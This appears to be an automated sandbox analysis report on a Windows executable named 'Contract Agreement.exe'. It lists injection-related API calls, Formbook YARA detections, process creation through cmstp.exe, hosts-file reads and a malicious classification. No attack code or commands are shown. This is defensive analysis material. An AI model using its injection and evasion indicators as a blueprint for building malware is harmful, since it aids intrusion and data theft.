          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A5B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A5A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A5AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59560 NtWriteFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A596D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A5A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A59770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A5A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419DB4 NtReadFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00419E0A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047395D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047396D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047395F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047397A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047398F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047398A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047399D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04739B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0473A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9E90 NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9E0A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9DB4 NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BB9D5A NtCreateFile,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0040102E
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00402D8D
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0041D669
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00409E3B
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0041D743
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_0041CFA3
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A420A0
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE20A8
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2B090
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE28EC
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AEE824
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A830
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD1002
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A399BF
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A34120
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A1F900
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE22AE
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4AEF
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ACFA2B
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4EBB0
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AC23E3
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD03DA
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A4ABD8
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADDBD2
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE2B28
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3A309
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A3AB40
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD4496
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2841F
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADD466
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A42581
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AD2D82
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A2D5E0
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE25DD
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A10D20
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE2D07
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE1D55
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE2EF7
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00A36E30
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00ADD616
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AE1FF1
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_2_00AEDFCE
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_0040102E
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00402D8D
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00402D90
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00409E40
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_0041D669
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_00409E3B
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 1_1_0041D743
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B477
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047BD466
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0470841F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4496
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C1D55
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046F0D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C2D07
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0470D5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C25DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04722581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B2D82
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04716E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047BD616
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C1FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047CDFCE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471A830
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047CE824
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B1002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C28EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047220A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C20A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0470B090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04714120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046FF900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047199BF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471B236
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047AFA2B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B4AEF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C22AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471AB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0479CB4F
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047C2B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0471A309
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047A23E3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047B03DA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_047BDBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472ABD8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0472138B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BA9E3B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BA9E40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BA2FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBCFA3
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BBD743
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BA2D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_02BA2D8D
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: String function: 00A1B150 appears 133 times
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: String function: 0041BBE0 appears 38 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 046FB150 appears 136 times
          Source: Contract Agreement.exe, 00000000.00000003.648343088.000000001EF16000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Contract Agreement.exe
          Source: Contract Agreement.exe, 00000001.00000002.688088335.0000000000B0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Contract Agreement.exe
          Source: Contract Agreement.exe, 00000001.00000002.687889109.0000000000970000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs Contract Agreement.exe
          Source: Contract Agreement.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.907184797.00000000004C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.687663466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.907519885.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.687843865.00000000008E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.648606618.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.687826261.00000000008B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.652649547.000000001EDA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Contract Agreement.exe.1eda0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Contract Agreement.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Contract Agreement.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Contract Agreement.exe.1eda0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@4/2
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Contract Agreement.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_01
          Source: C:\Users\user\Desktop\Contract Agreement.exeFile created: C:\Users\user\AppData\Local\Temp\nsg2E20.tmpJump to behavior
          Source: Contract Agreement.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Contract Agreement.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Contract Agreement.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Contract Agreement.exeReversingLabs: Detection: 20%
          Source: C:\Users\user\Desktop\Contract Agreement.exeFile read: C:\Users\user\Desktop\Contract Agreement.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Contract Agreement.exe 'C:\Users\user\Desktop\Contract Agreement.exe'
          Source: C:\Users\user\Desktop\Contract Agreement.exeProcess created: C:\Users\user\Desktop\Contract Agreement.exe 'C:\Users\user\Desktop\Contract Agreement.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
